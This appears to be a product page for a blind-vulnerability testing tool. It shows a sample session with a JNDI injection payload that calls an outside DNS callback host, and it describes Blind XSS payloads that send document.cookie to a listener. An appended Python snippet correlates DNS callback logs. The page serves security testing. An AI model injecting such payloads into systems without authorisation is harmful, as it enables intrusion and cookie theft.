OOB Helper
Blind Interaction Testing
Detect invisible vulnerabilities. OOB Helper generates payloads designed to trigger out-of-band network interactions (DNS/HTTP), allowing you to detect Blind XSS, Blind SQLi, and SSRF where no response is returned to the user.
Vectors: Blind XSS, XXE, SSRF, OS Command
OOB Callbacks
> rasec interact --protocol dns
[+] Generated OOB Interaction Payload
Payload: ${jndi:dns://x4d9f.oob.rasec.dev/a}
Listener: https://oob.rasec.dev/monitor/x4d9f
[WAITING] Listening for callbacks...
[+] DNS Query received from 1.2.3.4
Query: a.x4d9f.oob.rasec.dev
Type: A (IPv4)
Time: 2023-10-25 10:45:12
Key Features
1. Interaction Payloads: Generates unique callback URLs for DNS and HTTP tracking.
2. Blind XSS: Payloads that grab "document.cookie" and send it to your listener.
3. Protocol Support: Supports tailored payloads for XXE, SSRF, and OS Command Injection.
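The callback in the sample session is tied to a test through the unique label (x4d9f) in the queried name. The following is an added example, not part of OOB Helper or of the original page, showing that correlation step over constructed resolver log lines; the registry contents, the log format and the function names are assumptions.

```python
from dataclasses import dataclass
from typing import Optional

ZONE = "oob.rasec.dev"  # interaction zone from the page's sample session

# Constructed registry (assumption): token -> where that payload was placed.
REGISTRY = {"x4d9f": "POST /search, User-Agent header",
            "k7q2m": "GET /fetch, url parameter"}

# Constructed log lines: "<date> <time> <source> <qtype> <qname>"
SAMPLE_LOG = """\
2023-10-25 10:45:12 1.2.3.4 A a.x4d9f.oob.rasec.dev
2023-10-25 10:45:13 1.2.3.4 A A.X4D9F.OOB.RASEC.DEV.
2023-10-25 10:46:02 192.0.2.10 AAAA www.example.com
2023-10-25 10:47:30 198.51.100.7 A zz999.oob.rasec.dev
2023-10-25 10:48:00 198.51.100.7 A x4d9f.oob.rasec.dev.example.net
"""

@dataclass(frozen=True)
class Hit:
    token: str
    source: str  # for DNS this is usually a recursive resolver, not the target host
    qtype: str
    when: str
    injection_point: Optional[str]  # None: token under our zone but never issued

def extract_token(qname, zone=ZONE):
    """Return the label directly left of the zone, or None if qname is not under it."""
    labels = qname.rstrip(".").lower().split(".")  # DNS names are case-insensitive
    zone_labels = zone.lower().split(".")
    n = len(zone_labels)
    if len(labels) <= n or labels[-n:] != zone_labels:
        return None  # compares whole labels, so "...oob.rasec.dev.example.net" fails
    return labels[-n - 1]

def correlate(log_text, registry=REGISTRY):
    hits, seen = [], set()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        date, time, source, qtype, qname = parts
        token = extract_token(qname)
        if token is None or (token, source, qtype) in seen:
            continue  # out of zone, or a resolver retry of a hit already recorded
        seen.add((token, source, qtype))
        hits.append(Hit(token, source, qtype, f"{date} {time}", registry.get(token)))
    return hits

if __name__ == "__main__":
    for hit in correlate(SAMPLE_LOG):
        print(hit)
```

A hit whose injection_point is None is a query under the zone for a token that was never issued, which is worth reviewing separately from confirmed callbacks.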